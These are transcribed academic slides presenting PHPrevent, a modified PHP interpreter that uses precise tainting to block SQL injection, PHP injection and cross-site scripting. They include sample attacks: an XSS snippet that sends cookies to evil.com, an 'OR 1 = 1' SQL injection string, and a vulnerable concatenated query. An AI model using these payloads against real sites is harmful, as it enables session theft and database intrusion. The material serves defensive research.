automatically hardening web applications using precise tainting
Post on 02-Feb-2016
41 Views
Preview:
DESCRIPTION
TRANSCRIPT
Automatically Hardening Web Applications Using Precise
TaintingAnh Nguyen-TuongSalvatore Guarnieri
Doug GreeneJeff Shirley
David Evans
University of Virginia
2
phpBB Worm
• December 21, 2004
• Over 40,000 sites defaced
• PHP injection
• Loads Perl scripts to spread itself
• Uses Google to search for other phpBB sites
3
phpBB Vulnerability
$words = explode (' ', trim (htmlspecialchars (urldecode ($HTTP_GET_VARS ['highlight']))));...$highlight_match[] = ...
$words[$i] ...;...… preg_replace (...
$highlight_match ...)
Original user input: '_%2527_attack
User input after HTTP_GET_VARS call: \'_%27_attack
User input after explicit urldecode call: \'_'_attack
4
Classes of Attacks• Code injection
– Cause user provided data to be executed while data is being processed
• PHP injection (phpBB worm)• SQL injection
• Output generation– Cause user provided data to be displayed to
visitors of the website: Cross Site Scripting
5
SQL Injection
• Attacker constructs data that injects database commands
• Example:$res = executeQuery ("SELECT real_name
FROM users WHERE user = '" . $user . "'AND pwd = '" . $pwd . "' ");
6
Cross Site Scripting
• Inserts user provided data onto a webpage that may include JavaScript
• Executes with permissions of hosting website
• Simple example:<b onmouseover= 'location.href=
"http://evil.com/steal.php?" + document.cookie'>Hello</b>
7
8
Importance
• Over 12% of Secunia Advisories
• 4 of last 10 advisories from FrSIRT
• Cross Site Scripting and Code Injection are responsible for many attacks on the internet
• It is very hard to write bug free code
9
Previous Approaches
• Static techniques
• Dynamic techniques before deployment
• Dynamic techniques during deployment
10
Static
• Static analyzers [Shanker+ 01]• Code inspections [Fagan76]• SQL prepared statements [Fisk04, Php05]• Pros
– No runtime overhead– Can be done before website is released to the public
• Cons– Coding practices may need to change– Inspections are only as good as the inspector– Many false positives
11
Dynamic Before Deployment• Automated Test Suites: [Huang+ 04], [Tenable05],
[Kavado05], [Offutt+ 04], [Watchfire05], [SPI05]• Human testing• Pros
– Coding practices do not need to change– Attempts to simulate real world attacking conditions
• Cons– Only tests known attacks, cannot show absence of
vulnerability– Requires developer effort to fix security holes
12
Automated Dynamic: Firewalls
• Incoming [Scott, Sharp 02]• Incoming and Outgoing [Watchfire04],
[Kavado05], [Teros04] • Pros
– No need to modify web service
• Cons– Only prevent recognized attacks– Coarse policies without knowing application
semantics
13
Automated: Magic Quotes
• Escape all quotes supplied by a user
• Implemented in PHP and other scripting languages
• Extremely successful– Do not require the programmer to do anything– Prevent many SQL injection attacks– But, prevent only a specific class of attacks
14
Previous Work Limitations
• Being precise about what constitutes an attack is a lot of work
• Automated techniques suffer from not exploiting the application semantics
• We want a system that works as effortlessly as magic quotes, but prevents a wider class of attacks
15
Our Approach
• Fully automated
• Aware of application semantics
• Replace PHP interpreter with a modified interpreter that:– Keeps track of which information comes from
untrusted sources (precise tainting)– Checks how untrusted input is used
16
HTTP Server
PHP Interpreter
1
8
2 3
4
5
File System
file.php
Database
Clie
nt
Web Server System APIs
67
PHPreventPHPrevent
17
Coarse Grain Tainting
• Provided by many scripting languages (Perl, Ruby)
• Untrusted input is tainted• Everything touched by tainted data becomes
tainted
$query = "SELECT real_name FROM users WHERE user = '" . $user
. "'AND pwd = '"
. $pwd . "' ";Entire $query string is tainted
18
Precise Tainting
$query = "SELECT real_name FROM users WHERE user = '" . $user . "'AND pwd = '" . $pwd . "' ";$query = "SELECT real_name FROM users WHERE user = '' OR 1 = 1; -- ';'AND pwd = '' ";
• Untrusted input is tainted• Taint markings are maintained at character level
– Depends on semantics of program
• Only really tainted data is tainted
19
Precise Checking
• Wrappers around PHP functions that handle updating and checking precise taint information
• Conservative: no false negatives while minimizing false positives– Behavior only changes when an attack is
likely
20
Preventing SQL Injection
• Parse the query using the Postgres SQL parser: identify interpreted text
• Disallow SQL keywords or delimiters in interpreted text that is tainted– Query is not sent to database– Error response it returned
"SELECT real_name FROM users WHERE user = '' OR 1 = 1; -- ';' AND pwd = ''
";
21
Preventing PHP Injection
• Disallow tainted data to be used in functions that treat input strings as PHP code or manipulate system state– We place wrappers around these functions to
enforce this rule
• phpBB attack prevented by wrappers around preg_replace
22
Preventing Cross Site Scripting
• Wrappers around output functions– Buffer output and then parse the tainted output with HTML Tidy
• Check the parsed HTML against a white list to ensure there is no dangerous output– Dangerous content was determined by examining HTML
grammar – Sanitize it by removing tags
<b>Hello</b> Safe<b onmouseover= 'location.href=
"http://evil.com/steal.php?" + document.cookie'>Hello</b> Unsafe
23
Current Status• Modified PHP interpreter: PHPrevent
– Prevents PHP injection, SQL injection and cross site scripting attacks
– Overly conservative: we have not specified precise semantics for most PHP functions
• Performance– Initial measurements indicate performance
overhead is acceptable
24
Future Work: Theory and Analysis
• End-to-end information flow security• Replace ad-hoc taint marking with
principled mechanism– Analyze data flow at interpreter level– Infer taint specifications for PHP functions
using dynamic analysis
• Verify that taint marking in PHP specification is consistent with interpreter implementation
25
Future Work: Implementation
• Full implementation of precise tainting for PHP APIs
• Handle persistent state– Track tainting through database store
• Multiple tainting types with different checking rules
• Incorporate modifications into main PHP distribution
26
Summary
• Many websites are prone to attacks even after using current methods
• Our method:– Fully automated– Prevents large classes of attacks– Easy to deploy
27
Thank Youwww.cs.virginia.edu/sammyg
top related